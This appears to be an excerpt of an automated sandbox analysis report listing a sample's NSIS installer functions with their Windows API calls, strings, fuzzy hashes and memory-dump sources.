API ID: MessageSend$lstrlen$TextWindowlstrcat
String ID:
API String ID: 2531174081-0
Opcode ID: aabeaaca48730acbc73074f8e678aaac97ab8e564c9cd04649984117108eee2c
Instruction ID: 4e820289f32981fa80bdc57a8535783694e00142cb9a6ac2a8905b2d060becfb
Opcode Fuzzy Hash: aabeaaca48730acbc73074f8e678aaac97ab8e564c9cd04649984117108eee2c
Instruction Fuzzy Hash: 9D219D31D00518BACB21AF95DD84ADFBFB8EF44350F14807AF904B62A0C7794A41DFA8

Function 00402D18 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 51COMMON

Download Yara Rule

APIs

DestroyWindow.USER32(?,00000000), ref: 00402D33
GetTickCount.KERNEL32 ref: 00402D51
wsprintfW.USER32 ref: 00402D7F

Part of subcall function 00405192: lstrlenW.KERNEL32(004216B0,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402D92,00000000,?), ref: 004051CA
Part of subcall function 00405192: lstrlenW.KERNEL32(00402D92,004216B0,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402D92,00000000), ref: 004051DA
Part of subcall function 00405192: lstrcatW.KERNEL32(004216B0,00402D92,00402D92,004216B0,00000000,00000000,00000000), ref: 004051ED
Part of subcall function 00405192: SetWindowTextW.USER32(004216B0,004216B0), ref: 004051FF
Part of subcall function 00405192: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405225
Part of subcall function 00405192: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040523F
Part of subcall function 00405192: SendMessageW.USER32(?,00001013,?,00000000), ref: 0040524D

CreateDialogParamW.USER32(0000006F,00000000,00402C7D,00000000), ref: 00402DA3
ShowWindow.USER32(00000000,00000005), ref: 00402DB1

Part of subcall function 00402CFC: MulDiv.KERNEL32(?,00000064,?), ref: 00402D11

Strings

... %d%%, xrefs: 00402D79

Memory Dump Source

Source File: 00000004.00000002.2915675471.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.2915663573.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.2915687816.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.2915699697.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.2915718844.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_u9aPQQIwhj.jbxd

Similarity

API ID: MessageSendWindow$lstrlen$CountCreateDestroyDialogParamShowTextTicklstrcatwsprintf
String ID: ... %d%%
API String ID: 722711167-2449383134
Opcode ID: 201e492ae77eb6b4c8df967ba73cc99fc00f9962e74671e1787f0dc67121c729
Instruction ID: 06dbfd79dbb9e8c2a0b606a1608badac8d0e42e3594422c28149bacc2d6aa5cf
Opcode Fuzzy Hash: 201e492ae77eb6b4c8df967ba73cc99fc00f9962e74671e1787f0dc67121c729
Instruction Fuzzy Hash: AD016131945225EBD762AB60AE4DAEB7B68EF01700F14407BF845B11E1C7FC9D41CA9E

Function 00404A5C Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 48windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00404A77
GetMessagePos.USER32 ref: 00404A7F
ScreenToClient.USER32(?,?), ref: 00404A99
SendMessageW.USER32(?,00001111,00000000,?), ref: 00404AAB
SendMessageW.USER32(?,0000113E,00000000,?), ref: 00404AD1

Strings

f, xrefs: 00404AAD

Memory Dump Source

Source File: 00000004.00000002.2915675471.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.2915663573.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.2915687816.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.2915699697.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.2915718844.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_u9aPQQIwhj.jbxd

Similarity

API ID: Message$Send$ClientScreen
String ID: f
API String ID: 41195575-1993550816
Opcode ID: 06f6ebea5bc1d9fbd35e9f77c39338462eb0780e6261c6c1cca29060ed6e4b7a
Instruction ID: 7a49535742b5819285e47484f8d523d0bdd0b2e8bbf2cce5393fd09457f71794
Opcode Fuzzy Hash: 06f6ebea5bc1d9fbd35e9f77c39338462eb0780e6261c6c1cca29060ed6e4b7a
Instruction Fuzzy Hash: 0C014C71E40219BADB00DBA4DD85BFEBBBCAB54711F10412ABB11B61C0D6B4AA018BA5

Function 00402C7D Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 36timeCOMMON

Download Yara Rule

APIs

SetTimer.USER32(?,?,000000FA,00000000), ref: 00402C9B
wsprintfW.USER32 ref: 00402CCF
SetWindowTextW.USER32(?,?), ref: 00402CDF
SetDlgItemTextW.USER32(?,00000406,?), ref: 00402CF1

Strings

verifying installer: %d%%, xrefs: 00402CC4
unpacking data: %d%%, xrefs: 00402CBD, 00402CCD

Memory Dump Source

Source File: 00000004.00000002.2915675471.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.2915663573.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.2915687816.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.2915699697.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.2915718844.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_u9aPQQIwhj.jbxd

Similarity

API ID: Text$ItemTimerWindowwsprintf
String ID: unpacking data: %d%%$verifying installer: %d%%
API String ID: 1451636040-1158693248
Opcode ID: 51bd416a2a5802dcebde0e8cf043a9bf389b7035035a475ca1d7752134760d3a
Instruction ID: 136f1b4430288e91b1c5e5d445282cac07027c6a7f734139abdfd1d0af9ea11d
Opcode Fuzzy Hash: 51bd416a2a5802dcebde0e8cf043a9bf389b7035035a475ca1d7752134760d3a
Instruction Fuzzy Hash: C6F0127050410DABEF209F51DD49BAE3768BB00309F00843AFA16A51D0DBB95959DF59

Function 3904AA00 Relevance: 10.2, Strings: 8, Instructions: 229COMMON

Download Yara Rule

Strings

$^q, xrefs: 3904ABBE
$^q, xrefs: 3904ABB2
$^q, xrefs: 3904AB88
$^q, xrefs: 3904AB5D
$^q, xrefs: 3904AAF6
$^q, xrefs: 3904AB02
$^q, xrefs: 3904AB51
$^q, xrefs: 3904AB7C

Memory Dump Source

Source File: 00000004.00000002.2937320369.0000000039040000.00000040.00000800.00020000.00000000.sdmp, Offset: 39040000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_39040000_u9aPQQIwhj.jbxd

Similarity

API ID:
String ID: $^q$$^q$$^q$$^q$$^q$$^q$$^q$$^q
API String ID: 0-3823777903
Opcode ID: 7ccc28fcdcb55aed1c6be28d824080e0d361158b26e59fb3c9f44876b661714c
Instruction ID: 4e2b04be86e469719605c8e6d83f5c1d182d7f5bc4e74aeb210e83b52eb187fa
Opcode Fuzzy Hash: 7ccc28fcdcb55aed1c6be28d824080e0d361158b26e59fb3c9f44876b661714c
Instruction Fuzzy Hash: 29916D34A00209DFFB18DB64C996B6E77F7BF44340F108979E402AB295DB34A845CF91

Function 39047160 Relevance: 9.2, Strings: 7, Instructions: 405COMMON

Download Yara Rule

Strings

$^q, xrefs: 39047668
$^q, xrefs: 39047442
.5vq, xrefs: 390471BB
$^q, xrefs: 390474A8
$^q, xrefs: 3904749C
$^q, xrefs: 39047674
$^q, xrefs: 390475FC

Memory Dump Source

Source File: 00000004.00000002.2937320369.0000000039040000.00000040.00000800.00020000.00000000.sdmp, Offset: 39040000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_39040000_u9aPQQIwhj.jbxd

Similarity

API ID:
String ID: .5vq$$^q$$^q$$^q$$^q$$^q$$^q
API String ID: 0-390881366
Opcode ID: 1a6432445960876793f6af33efe9447173c1400e45c581a4935271ad9800190a
Instruction ID: 91198cd29ac192a550e5734a742640099b598356c5ed2d064b7be675b560ec6b
Opcode Fuzzy Hash: 1a6432445960876793f6af33efe9447173c1400e45c581a4935271ad9800190a
Instruction Fuzzy Hash: A8F11F34A00209CFDB19EBA8C594A5EB7F3BF84341F608969D415AB365DB35EC86CF81

Function 0040317B Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 108fileCOMMON

Download Yara Rule

APIs

GetTickCount.KERNEL32 ref: 00403190

Part of subcall function 0040330D: SetFilePointer.KERNEL32(00000000,00000000,00000000,00402FE5,?), ref: 0040331B

SetFilePointer.KERNEL32(00000000,00000000,?,00000000,?,00403093,00000004,00000000,00000000,?,?,?,0040300C,000000FF,00000000,00000000), ref: 004031C3
WriteFile.KERNEL32(0040BE78,?,00000000,00000000,00413E78,00004000,?,00000000,?,00403093,00000004,00000000,00000000,?,?), ref: 0040327D
SetFilePointer.KERNEL32(?,00000000,00000000,00413E78,00004000,?,00000000,?,00403093,00000004,00000000,00000000,?,?,?,0040300C), ref: 004032CF

Strings

x>A, xrefs: 004031F0

Memory Dump Source

Source File: 00000004.00000002.2915675471.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.2915663573.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.2915687816.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.2915699697.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.2915718844.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_u9aPQQIwhj.jbxd

Similarity

API ID: File$Pointer$CountTickWrite
String ID: x>A
API String ID: 2146148272-3854404225
Opcode ID: c3e212118fbef9e4adb068f61efe2bd575096358676594393449bc7ea11798d5
Instruction ID: 37036d35f8974e55ed68100cf34a45723990335e8d7a2adc0945050858e8c70a
Opcode Fuzzy Hash: c3e212118fbef9e4adb068f61efe2bd575096358676594393449bc7ea11798d5
Instruction Fuzzy Hash: 7D41CB725042019FDB10DF29ED848A63BACFB54356720827FE910B22E1D7B99D41DBED

Function 0040617C Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 69COMMON

Download Yara Rule

APIs

CharNextW.USER32(?,*?|<>/":,00000000,00434000,00436800,00436800,00000000,00403330,00436800,74DF3420,00403510), ref: 004061DF
CharNextW.USER32(?,?,?,00000000), ref: 004061EE
CharNextW.USER32(?,00434000,00436800,00436800,00000000,00403330,00436800,74DF3420,00403510), ref: 004061F3
CharPrevW.USER32(?,?,00436800,00436800,00000000,00403330,00436800,74DF3420,00403510), ref: 00406206

Strings

*?|<>/":, xrefs: 004061CE

Memory Dump Source

Source File: 00000004.00000002.2915675471.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.2915663573.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.2915687816.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.2915699697.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.2915718844.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_u9aPQQIwhj.jbxd

Similarity

API ID: Char$Next$Prev
String ID: *?|<>/":
API String ID: 589700163-165019052
Opcode ID: bf19904cbb26e83114afcd58bf256c97857e1bb2abc1c9c3e805ea3815cda1ed
Instruction ID: 7432597920acc0cf63456e540fa2db4f3ec2516b3ebf296f4b2d54ebc9aa4c6f
Opcode Fuzzy Hash: bf19904cbb26e83114afcd58bf256c97857e1bb2abc1c9c3e805ea3815cda1ed
Instruction Fuzzy Hash: B711B67580021295EB303B548C40BB762F8AF54760F56803FE996772C2EB7C5C9286BD

Function 004024EC Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 54filestringCOMMON

Download Yara Rule

APIs

WideCharToMultiByte.KERNEL32(?,?,0040A580,000000FF,00409D80,00000400,?,?,00000021), ref: 0040252D
lstrlenA.KERNEL32(00409D80,?,?,0040A580,000000FF,00409D80,00000400,?,?,00000021), ref: 00402534
WriteFile.KERNEL32(00000000,?,00409D80,00000000,?,?,00000000,00000011), ref: 00402566

Strings

8, xrefs: 0040250A

Memory Dump Source

Source File: 00000004.00000002.2915675471.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.2915663573.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.2915687816.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.2915699697.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.2915718844.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_u9aPQQIwhj.jbxd

Similarity

API ID: ByteCharFileMultiWideWritelstrlen
String ID: 8
API String ID: 1453599865-4194326291
Opcode ID: eb4f0eac3f684fb2a63f37bc1092f8bc6a44a302634324d4ca23fee1544f7428
Instruction ID: 3c80ca3e5ebaf71c7783d8616bec5f928a83f38c30d871a0748769bbcf272298
Opcode Fuzzy Hash: eb4f0eac3f684fb2a63f37bc1092f8bc6a44a302634324d4ca23fee1544f7428
Instruction Fuzzy Hash: 8B019271A44204BED700AFA0DE89EAF7278EB50319F20053BF502B61D2D7BC5E41DA2E

Function 00401752 Relevance: 7.6, APIs: 5, Instructions: 145stringtimeCOMMON

Download Yara Rule

APIs

lstrcatW.KERNEL32(00000000,00000000,00409580,00435000,?,?,00000031), ref: 00401793
CompareFileTime.KERNEL32(-00000014,?,00409580,00409580,00000000,00000000,00409580,00435000,?,?,00000031), ref: 004017B8

Part of subcall function 00405EE8: lstrcpynW.KERNEL32(?,?,00000400,004033C6,004281E0,NSIS Error), ref: 00405EF5

Part of subcall function 00405192: lstrlenW.KERNEL32(004216B0,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402D92,00000000,?), ref: 004051CA
Part of subcall function 00405192: lstrlenW.KERNEL32(00402D92,004216B0,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402D92,00000000), ref: 004051DA
Part of subcall function 00405192: lstrcatW.KERNEL32(004216B0,00402D92,00402D92,004216B0,00000000,00000000,00000000), ref: 004051ED
Part of subcall function 00405192: SetWindowTextW.USER32(004216B0,004216B0), ref: 004051FF
Part of subcall function 00405192: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405225
Part of subcall function 00405192: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040523F
Part of subcall function 00405192: SendMessageW.USER32(?,00001013,?,00000000), ref: 0040524D

Memory Dump Source

Source File: 00000004.00000002.2915675471.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.2915663573.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.2915687816.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.2915699697.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.2915718844.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_u9aPQQIwhj.jbxd

Similarity

API ID: MessageSend$lstrcatlstrlen$CompareFileTextTimeWindowlstrcpyn
String ID:
API String ID: 1941528284-0
Opcode ID: f85250a5a9e88103d3d651ef37910dcedbb4e657076cd08a1369e1982fdbe284
Instruction ID: 10c9bfb48ac22d70b7a6fd4bf6847715cc6e5200bae8767ad0241ecc3b8f07ee
Opcode Fuzzy Hash: f85250a5a9e88103d3d651ef37910dcedbb4e657076cd08a1369e1982fdbe284
Instruction Fuzzy Hash: 6841B172904519BACF10BBB5CC86DAF7679EF05329F20463BF521B11E1D63C8A41CA6E

Function 00402B78 Relevance: 7.6, APIs: 5, Instructions: 67registryCOMMON

Download Yara Rule

APIs

RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00402B99
RegEnumKeyW.ADVAPI32(?,00000000,?,00000105), ref: 00402BD5
RegCloseKey.ADVAPI32(?), ref: 00402BDE
RegCloseKey.ADVAPI32(?), ref: 00402C03
RegDeleteKeyW.ADVAPI32(?,?), ref: 00402C21

Memory Dump Source

Source File: 00000004.00000002.2915675471.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.2915663573.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.2915687816.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.2915699697.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.2915718844.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_u9aPQQIwhj.jbxd

Similarity

API ID: Close$DeleteEnumOpen
String ID:
API String ID: 1912718029-0
Opcode ID: 91a0cc9b62795f3a8a15dda2708214bc4454f5c9052d466bcbd9eea0ad329b5b
Instruction ID: 9ec10266fc8442ca9feb2f2c36393197ef7fd7660a084b6a818e704b420db749
Opcode Fuzzy Hash: 91a0cc9b62795f3a8a15dda2708214bc4454f5c9052d466bcbd9eea0ad329b5b
Instruction Fuzzy Hash: 0D113A7190410CFEEF11AF90DE89EAE3B79EB44348F10057AFA05A10E0D3B59E51AA69

Function 00401CE5 Relevance: 7.5, APIs: 5, Instructions: 39windowCOMMON

Download Yara Rule

APIs

GetDlgItem.USER32(?,?), ref: 00401CEB
GetClientRect.USER32(00000000,?), ref: 00401CF8
LoadImageW.USER32(?,00000000,?,?,?,?), ref: 00401D19
SendMessageW.USER32(00000000,00000172,?,00000000), ref: 00401D27
DeleteObject.GDI32(00000000), ref: 00401D36

Memory Dump Source

Source File: 00000004.00000002.2915675471.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.2915663573.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.2915687816.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.2915699697.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.2915718844.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_u9aPQQIwhj.jbxd

Similarity

API ID: ClientDeleteImageItemLoadMessageObjectRectSend
String ID:
API String ID: 1849352358-0
Opcode ID: ebee129f8a245dc929862c077a7183d7f7680bcc51d1a04b4969c9551adf2949
Instruction ID: d276e06630420d280db9d3d8713a95f95ab602fc4af0e03377fdcd968a8fda9f
Opcode Fuzzy Hash: ebee129f8a245dc929862c077a7183d7f7680bcc51d1a04b4969c9551adf2949
Instruction Fuzzy Hash: B9F0ECB2A04104AFD701DFE4EE88CEEB7BCEB08301B100466F601F61A0D674AD018B39

Function 00401D41 Relevance: 7.5, APIs: 5, Instructions: 38COMMON

Download Yara Rule

APIs

GetDC.USER32(?), ref: 00401D44
GetDeviceCaps.GDI32(00000000,0000005A), ref: 00401D51
MulDiv.KERNEL32(00000000,00000002,00000000), ref: 00401D60
ReleaseDC.USER32(?,00000000), ref: 00401D71
CreateFontIndirectW.GDI32(0040BD88), ref: 00401DBC

Memory Dump Source

Source File: 00000004.00000002.2915675471.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.2915663573.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.2915687816.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.2915699697.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.2915718844.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_u9aPQQIwhj.jbxd

Similarity

API ID: CapsCreateDeviceFontIndirectRelease
String ID:
API String ID: 3808545654-0
Opcode ID: 5126b5a6483c23ca9b923fe170de86e7b0dfb2dc664948fdd2ce29f1bdd8c223
Instruction ID: 44c615356a1505882b51123a4f434c8e94683597a24d5f064f7d9f3cb87cb74c
Opcode Fuzzy Hash: 5126b5a6483c23ca9b923fe170de86e7b0dfb2dc664948fdd2ce29f1bdd8c223
Instruction Fuzzy Hash: 25012630948280AFE7006BB0AE4BB9A7F74EF95305F104479F145B62E2C37810009B6E

Function 00403060 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 95fileCOMMON

Download Yara Rule

APIs

SetFilePointer.KERNEL32(00409230,00000000,00000000,00000000,00000000,?,?,?,0040300C,000000FF,00000000,00000000,00409230,?), ref: 00403086
WriteFile.KERNEL32(00000000,00413E78,?,000000FF,00000000,00413E78,00004000,00409230,00409230,00000004,00000004,00000000,00000000,?,?), ref: 00403113

Strings

x>A, xrefs: 004030DC

Memory Dump Source

Source File: 00000004.00000002.2915675471.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.2915663573.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.2915687816.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.2915699697.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.2915718844.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_u9aPQQIwhj.jbxd

Similarity

API ID: File$PointerWrite
String ID: x>A
API String ID: 539440098-3854404225
Opcode ID: b27c88111c9479bfc016d655c0b2bfb1ccfb1f1bf46317cd24110ceb5cc412c0
Instruction ID: fc2ead670903f3fcf09a518996cfd184d9dc321171b4a7c5d6e0cc79c3f8c1f9
Opcode Fuzzy Hash: b27c88111c9479bfc016d655c0b2bfb1ccfb1f1bf46317cd24110ceb5cc412c0
Instruction Fuzzy Hash: 8C312631504219FBDF11CF65EC44A9E3FBCEB08755F20813AF904AA1A0D3749E51DBA9

Function 00404976 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 78stringCOMMON

Download Yara Rule

APIs

lstrlenW.KERNEL32(004226D0,004226D0,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,?,000000DF,0000040F,00000400,00000000), ref: 00404A07
wsprintfW.USER32 ref: 00404A10
SetDlgItemTextW.USER32(?,004226D0), ref: 00404A23

Strings

%u.%u%s%s, xrefs: 004049F1

Memory Dump Source

Source File: 00000004.00000002.2915675471.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.2915663573.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.2915687816.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.2915699697.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.2915718844.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_u9aPQQIwhj.jbxd

Similarity

API ID: ItemTextlstrlenwsprintf
String ID: %u.%u%s%s
API String ID: 3540041739-3551169577
Opcode ID: a87d65089fa2b22b88f3ea6921d71f9a407986b65cfb91be1df2eb5324c2a4fc
Instruction ID: 11a56ec29d8e774b63c5a31ca8dd146b3e369a93441477fc7d09fda37b012288
Opcode Fuzzy Hash: a87d65089fa2b22b88f3ea6921d71f9a407986b65cfb91be1df2eb5324c2a4fc
Instruction Fuzzy Hash: 7011E273A002243BCB10A66D9C45EAF368D9BC6374F14423BFA69F61D1D9799C2186EC

Function 00401BCA Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 76windowtimeCOMMON

Download Yara Rule

APIs

SendMessageTimeoutW.USER32(00000000,00000000,?,?,?,00000002,?), ref: 00401C2A
SendMessageW.USER32(00000000,00000000,?,?), ref: 00401C42

Strings

!, xrefs: 00401BFE

Memory Dump Source

Source File: 00000004.00000002.2915675471.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.2915663573.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.2915687816.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.2915699697.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.2915718844.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_u9aPQQIwhj.jbxd

Similarity

API ID: MessageSend$Timeout
String ID: !
API String ID: 1777923405-2657877971
Opcode ID: 9d438e6b5940c4dfeb703fc487ee7d8779a96f3a357671301b43fd1e281e0956
Instruction ID: 4e2ee5f0d92934ddef816e72561913b102c535ce611946f90f9b6b3ff638ae8b
Opcode Fuzzy Hash: 9d438e6b5940c4dfeb703fc487ee7d8779a96f3a357671301b43fd1e281e0956
Instruction Fuzzy Hash: 2221A171A44208AEEF01AFB0C98AEAD7B75EF45308F10413AF602B61D1D6B8A941DB19

Function 0040232F Relevance: 6.1, APIs: 4, Instructions: 71registrystringCOMMON

Download Yara Rule

APIs

RegCreateKeyExW.ADVAPI32(00000000,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 0040236D
lstrlenW.KERNEL32(0040A580,00000023,?,?,?,?,?,?,?,00000011,00000002), ref: 0040238D
RegSetValueExW.ADVAPI32(?,?,?,?,0040A580,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 004023C9
RegCloseKey.ADVAPI32(?,?,?,0040A580,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 004024AA

Memory Dump Source

Source File: 00000004.00000002.2915675471.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.2915663573.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.2915687816.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.2915699697.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.2915718844.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_u9aPQQIwhj.jbxd

Similarity

API ID: CloseCreateValuelstrlen
String ID:
API String ID: 1356686001-0
Opcode ID: d61713cf9ddd3f610e149d83436bff4682ee40a9bf76952b8ac674dc90b080fe
Instruction ID: 4c75d48ff27920bf3256dab6d3d18bc6d0e5d26c1911ded3a9e9fdbcc9a4e390
Opcode Fuzzy Hash: d61713cf9ddd3f610e149d83436bff4682ee40a9bf76952b8ac674dc90b080fe
Instruction Fuzzy Hash: 89118EB1A00108BEEB10AFA4DE4AEAF777CEB54358F10043AF504B61D0D7B86E419B69

Function 004015B9 Relevance: 6.1, APIs: 4, Instructions: 57COMMON

Download Yara Rule

APIs

Part of subcall function 004059DE: CharNextW.USER32(?,?,00424ED8,?,00405A52,00424ED8,00424ED8,00436800,?,74DF2EE0,00405790,?,00436800,74DF2EE0,00434000), ref: 004059EC
Part of subcall function 004059DE: CharNextW.USER32(00000000), ref: 004059F1
Part of subcall function 004059DE: CharNextW.USER32(00000000), ref: 00405A09

CreateDirectoryW.KERNEL32(?,?,00000000,0000005C,00000000,000000F0), ref: 004015E3
GetLastError.KERNEL32(?,00000000,0000005C,00000000,000000F0), ref: 004015ED
GetFileAttributesW.KERNEL32(?,?,00000000,0000005C,00000000,000000F0), ref: 004015FD
SetCurrentDirectoryW.KERNEL32(?,00435000,?,00000000,000000F0), ref: 00401630

Memory Dump Source

Source File: 00000004.00000002.2915675471.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.2915663573.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.2915687816.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.2915699697.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.2915718844.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_u9aPQQIwhj.jbxd

Similarity

API ID: CharNext$Directory$AttributesCreateCurrentErrorFileLast
String ID:
API String ID: 3751793516-0
Opcode ID: 0bff73914de4e6eed910c0ec0e64b32a9aea0308159657b3b0e440d9c8159a1f
Instruction ID: 199c01fa1d361ac50fd0ab4436582695df459e1bfde9dc24052da25e00d2fbae
Opcode Fuzzy Hash: 0bff73914de4e6eed910c0ec0e64b32a9aea0308159657b3b0e440d9c8159a1f
Instruction Fuzzy Hash: D011C271908104EBDB206FA0CD449AF36B0EF15365B64063BF881B62E1D63D49819A6E

